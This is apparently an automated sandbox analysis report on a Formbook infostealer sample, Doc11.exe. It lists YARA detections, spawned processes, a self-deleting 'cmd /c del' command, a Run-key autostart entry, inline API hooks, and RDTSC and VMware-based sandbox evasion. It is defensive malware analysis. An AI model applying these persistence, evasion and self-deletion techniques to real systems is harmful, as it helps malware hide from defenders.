Source: 00000006.00000002.441196433.0000000000CF0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
Source: 00000000.00000002.196042913.0000000004D22000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
Source: 00000000.00000002.196042913.0000000004D22000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
Source: 00000006.00000002.441238070.0000000000D20000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
Source: 00000006.00000002.441238070.0000000000D20000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
Source: 00000002.00000002.226978811.0000000001470000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
Source: 00000002.00000002.226978811.0000000001470000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
Source: 00000002.00000002.226316496.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
Source: 00000002.00000002.226316496.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
Source: 00000006.00000002.440648405.0000000000B00000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
Source: 00000006.00000002.440648405.0000000000B00000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
Source: 00000000.00000002.194432972.0000000004178000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
Source: 00000000.00000002.194432972.0000000004178000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
Source: 0.2.Doc11.exe.6320000.3.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
Source: 0.2.Doc11.exe.6320000.3.unpack, type: UNPACKEDPE; Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
Source: 0.2.Doc11.exe.6320000.3.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
Source: 0.2.Doc11.exe.6320000.3.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: Doc11.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@9/4@3/4
          Source: C:\Users\user\Desktop\Doc11.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Doc11.exe.log
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5708:120:WilError_01
          Source: C:\Users\user\Desktop\Doc11.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\explorer.exe | File read: C:\Users\user\AppData\Roaming\7L8580B-\7L8logri.ini
          Source: C:\Users\user\Desktop\Doc11.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: Doc11.exe | Virustotal: Detection: 34%
          Source: Doc11.exe | ReversingLabs: Detection: 25%
          Source: unknown | Process created: C:\Users\user\Desktop\Doc11.exe 'C:\Users\user\Desktop\Doc11.exe'
          Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Source: unknown | Process created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
          Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'
          Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Doc11.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Source: C:\Users\user\Desktop\Doc11.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Source: C:\Windows\SysWOW64\cscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'
          Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{317D06E8-5F24-433D-BDF7-79CE68D8ABC2}\InProcServer32
          Source: C:\Windows\SysWOW64\cscript.exe | File written: C:\Users\user\AppData\Roaming\7L8580B-\7L8logri.ini
          Source: C:\Windows\SysWOW64\cscript.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: Doc11.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Doc11.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cscript.pdbUGP source: RegAsm.exe, 00000002.00000002.227587280.0000000003010000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000002.00000002.227632586.0000000003100000.00000040.00000001.sdmp, cscript.exe, 00000006.00000002.443093817.0000000004CDF000.00000040.00000001.sdmp
          Source: Binary string: RegAsm.pdb source: cscript.exe, 00000006.00000002.441341304.0000000000DA7000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdb source: RegAsm.exe, cscript.exe
          Source: Binary string: RegAsm.pdb4 source: cscript.exe, 00000006.00000002.441341304.0000000000DA7000.00000004.00000020.sdmp
          Source: Binary string: cscript.pdb source: RegAsm.exe, 00000002.00000002.227587280.0000000003010000.00000040.00000001.sdmp
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00417C5A push esp; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_0041CDF5 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_0041658D push ds; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_0041CE42 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_0041CE4B push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_004176EE push cs; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_0041CEAC push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_0317D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_04C3D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_00B1DB5C push edi; ret
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_00B1DCA9 push 0D8910A8h; iretd
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_00B17C5A push esp; iretd
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_00B1CDF5 push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_00B1CEAC push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_00B176EE push cs; retf
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_00B1CE42 push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 6_2_00B1CE4B push eax; ret
          Source: initial sample | Static PE information: section name: .text entropy: 7.85074481612

          Boot Survival:

          Creates an undocumented autostart registry key
          Source: C:\Windows\SysWOW64\cscript.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run 3FL0ZNGX9

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x87 0x7E 0xED
          Source: C:\Users\user\Desktop\Doc11.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cscript.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | RDTSC instruction interceptor: First address: 00000000004098D4 second address: 00000000004098DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | RDTSC instruction interceptor: First address: 0000000000409B3E second address: 0000000000409B44 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exe | RDTSC instruction interceptor: First address: 0000000000B098D4 second address: 0000000000B098DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exe | RDTSC instruction interceptor: First address: 0000000000B09B3E second address: 0000000000B09B44 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00409A70 rdtsc
          Source: C:\Users\user\Desktop\Doc11.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Doc11.exe TID: 4472 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 4968 | Thread sleep time: -48000s >= -30000s
          Source: C:\Windows\SysWOW64\cscript.exe TID: 3276 | Thread sleep time: -55000s >= -30000s
          Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
          Source: explorer.exe, 00000003.00000000.208172847.0000000007E80000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000000.191541658.0000000000DB8000.00000004.00000020.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}=1
          Source: explorer.exe, 00000003.00000002.454870941.00000000059D0000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000003.00000002.452746003.000000000474A000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.210149514.0000000007FBB000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000003.00000002.452859301.00000000047E8000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.205152318.0000000006912000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.210095455.0000000007FAC000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m
          Source: explorer.exe, 00000003.00000000.213997024.000000000E5C0000.00000004.00000001.sdmp | Binary or memory string:
          Source: explorer.exe, 00000003.00000002.454870941.00000000059D0000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000002.454870941.00000000059D0000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000003.00000000.208055551.0000000007E03000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000003.00000002.454870941.00000000059D0000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process information queried: ProcessInformation